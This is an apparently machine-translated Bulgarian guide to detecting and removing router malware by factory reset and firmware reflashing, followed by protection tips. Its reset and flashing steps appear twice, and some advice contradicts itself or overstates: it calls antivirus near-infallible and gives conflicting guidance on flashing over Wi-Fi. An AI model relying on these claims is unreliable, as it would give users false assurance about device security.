- За да преконфигурирате рутера, трябва да го свържете към компютъра чрез кабел, след което да отворите браузъра и да отидете на http://192.168.0.1. Може би адресът ще бъде различен, можете да го намерите на стикер, разположен на самия рутер, или в документацията, придружаваща рутера. Ще бъдете помолени за вход и парола, по подразбиране входът е admin, а паролата е admin или 12345. За повече подробности вижте инструкциите за рутера.
- Отидете на бърза настройка. Посочете опциите, които ви подхождат. Ако искате, задайте парола и сменете името на мрежата. След като преминете през процедурата за настройка, запазете промените и рестартирайте рутера.
Отидете в секцията „Бърза настройка“ и задайте удобни настройки
След като изпълните всички горни стъпки, проверете дали сте се отървали от грешката. Ако не, тогава ще трябва да презаредите рутера ръчно.
Мигане на рутера
Фърмуерът на рутера е възможен само ако устройството е свързано към компютъра с кабел. Не можете да актуализирате фърмуера през Wi-Fi.
- На гърба на рутера има стикер. Намерете вашия модел рутер върху него. Той също така съдържа информация за версията на първоначално инсталирания фърмуер. Ако неговата версия е 7, тогава е по-добре да инсталирате актуализацията за версия 7, за да избегнете конфликт на твърде нов фърмуер със стария хардуер на рутера.
Разберете версията на фърмуера и модела на рутера
- Отидете на уебсайта на производителя и използвайте полето за търсене, за да намерите правилната версия за вашия модел. Изтеглете го на вашия компютър.
Намерете и изтеглете необходимата версия на фърмуера
- Изтегленият файл ще бъде архивиран. Извлечете съдържанието му във всяка удобна папка.
Посочете пътя към фърмуера
- Стартирайте процедурата за актуализиране и изчакайте да приключи. Рестартирайте вашия рутер. Фърмуерът трябва да се актуализира и всички проблеми и вируси най-вероятно са изчезнали.
Изчакваме инсталацията да приключи
Видео: как да флашнете рутер
Как да защитите вашия рутер от вируси в бъдеще
Единственият начин да защитите рутера от вируси е да им попречите да проникнат в компютъра. Вашият компютър е защитен с антивирусна програма. Инсталирайте и при никакви обстоятелства не деактивирайте съвременната антивирусна програма. Почти невъзможно е да се хване зловреден софтуер с активирана антивирусна програма. Дори не е необходимо да използвате платени програми за сигурност, в наше време има достатъчно висококачествени безплатни аналози.
Какво да направите, ако нищо не помогна
Ако изпълнението на всички горни инструкции не доведе до желания резултат, остават две възможности: проблемът възниква поради повреда във физическата част на рутера или грешки от страна на доставчика. Първо, трябва да се обадите на компанията, която ви предоставя интернет, и да им кажете за вашия проблем и методите, които не са помогнали за разрешаването му. Второ, рутерът трябва да се занесе в специален сервиз, за да бъде прегледан от специалисти.
Заразяването с рутер вирус е рядко, но опасно. Има два начина да се отървете от вируса: нулиране на настройките и актуализиране на фърмуера. Също така трябва да се уверите, че зловредният софтуер не е останал на компютъра.
По време на разпространението на интернет чрез Wi-Fi през рутер могат да възникнат различни проблеми. Например забавяне и висок ping могат да възникнат поради вируси, заразили разпределителното оборудване. Нека да разгледаме по-отблизо как да почистите рутера сами.
Симптоми
Оборудването може да бъде заразено със следните видове вируси:
- забавяне на скоростта на трансфер на данни. Например, вирусът е в състояние да събори настройките, ще има ниска скорост, загуба на сигнал и т.н.;
- подмяна на адреси на сайтове. Това се случва по следния начин: човек отива на ресурс и злонамерена програма променя DNS и потребителят се пренасочва към сайт с реклами или рекламни блокове, поставени от собствениците на сайта, стават видими за него. Този вирус също е опасен, защото може да пренасочи към ресурс, който съдържа друго злонамерено съдържание.
Във всеки случай, ако рутерът е нестабилен, е необходимо да го проверите за вируси, които са доста лесни за премахване.
Как възниква инфекцията?
Рутерът разпространява интернет до всички джаджи, свързани към него. Това означава, че всички устройства работят в една и съща локална мрежа. Вирусът използва това: влиза в компютъра чрез уебсайт или изтеглен файл, след което през мрежата влиза в рутера, където извършва злонамерени действия.
Тежестта на ситуацията зависи от версията на вирусната програма, например някои вредители се държат тайно и започват да действат активно само когато са в рутера, докато други, напротив, могат да повредят операционната система по пътя.
Проверка на мрежовото оборудване за заразяване
Преди да почистите оборудването от вируси, трябва да проверите рутера за тяхното присъствие. За да направите това, трябва да свържете интернет кабела директно към порта на компютъра. Издърпайте WLAN кабела от рутера и го свържете към компютъра, след което изпълнете следните манипулации:
- Стартирайте браузъра си и отворете няколко сайта. Уверете се, че съдържанието им е коректно и че няма замени на сайтове, рекламни елементи. За целите на проверката е по-добре да изберете ресурси, в които не може да има реклама.
- Започнете да сканирате компютъра си с антивирусна програма. Това е необходимо, за да се определи пътя на заразяване - от компютър или от рутер. Имайте предвид, че може да има няколко вируса и те могат да присъстват както в системата, така и в мрежовото оборудване.
Премахване на вируси
Гледайте видеоклип за заразяване на рутер с вируси тук:
За да премахнете злонамерения софтуер, трябва да върнете настройките към оригинала. Ако вирусната програма вече е навредила на фърмуера, тя ще трябва да бъде преинсталирана.
Опции за нулиране
За да почистите рутера, трябва да нулирате настройките му:
- Намерете бутона за нулиране на гърба на устройството. Тя често се откроява от тълпата. Задръжте го натиснат и задръжте, докато рутерът се нулира и рестартира. Не забравяйте, че когато рестартирате, всички настройки ще бъдат загубени и рутерът ще трябва да бъде конфигуриран отново.
- За да конфигурирате рутера, трябва да го свържете към компютъра с помощта на кабел, след което стартирате браузъра и въведете адреса 192.168.0.1. Може да е различно и е посочено на самия рутер или в документите за него, в инструкциите. Когато влизате в настройките, те често въвеждат администраторското име, а паролата е същата или 12345. Ако не сте успели да влезете, трябва да погледнете инструкциите за мрежовото оборудване.
- Намерете опции за бързи настройки. Изберете всички приложими елементи. Можете също да промените паролата и името на мрежата. След като завършите процеса на конфигуриране, запазете ги и рестартирайте рутера.
След като изпълните всички описани стъпки, проверете дали сте успели да се отървете от проблема. Ако не, тогава ще трябва да флашнете мрежовото оборудване.
Как да извършите мигане?
Случва се вирусна програма да промени фърмуера на рутера. Можете да неутрализирате заразената версия, като я флашнете.
Свържете вашия компютър към рутера чрез LAN кабел. Трябва да бъде включен във всеки рутер. Ако не, тогава можете да използвате Wi-Fi връзка. За предпочитане обаче е кабелна връзка.
След като се свържете с рутера, стартирайте браузъра и въведете стойността 192.168.1.1 (или друга, посочена на самото устройство) в адресното поле, след което ще трябва да въведете паролата и да влезете, за да отворите настройките на рутера. Потребителското име и паролата по подразбиране са admin. Ако не можете да въведете настройките, тогава трябва да разберете текущите данни за вход, може би те са били променени след последната инсталация.
Изтеглете новата версия на фърмуера от уебсайта на производителя и отидете в настройките на рутера и го изберете на диска на компютъра. Процесът на фърмуера за всички рутери е идентичен.
Защита на мрежово оборудване от вируси
За да защитите вашия рутер от заразяване, можете да използвате следните препоръки:
- Актуализирайте фърмуера до най-новата версия. Посетете уебсайта на производителя, потърсете вашия модел и изтеглете най-новия фърмуер.
- Задайте стойност на многозначна парола в уеб интерфейса. Не всички рутери ви позволяват да промените вашето влизане. Въпреки това, ако зададете сложна парола, няма да е лесно да хакнете уеб интерфейса.
- Задайте офлайн влизане в настройките на рутера.
- Променете IP адреса на рутера при локален достъп. По време на процеса на хакване вирусът незабавно ще получи достъп до адреси като 192.168.0.1 и 192.168.1.1. Въз основа на това е по-добре да промените третия и четвъртия октет на LAN IP адреса.
- Инсталирайте надеждна антивирусна програма на вашия компютър. Ако вирусът първо се опита да влезе в компютъра, той ще бъде премахнат незабавно, което ще попречи да навреди на рутера.
- Не съхранявайте пароли в браузъра.
Както можете да видите, проверката на рутера за вируси и почистването му е лесно. Но е по-добре да следвате прости съвети, за да предотвратите инфекция. Но ако това се случи, знаете какво да правите.
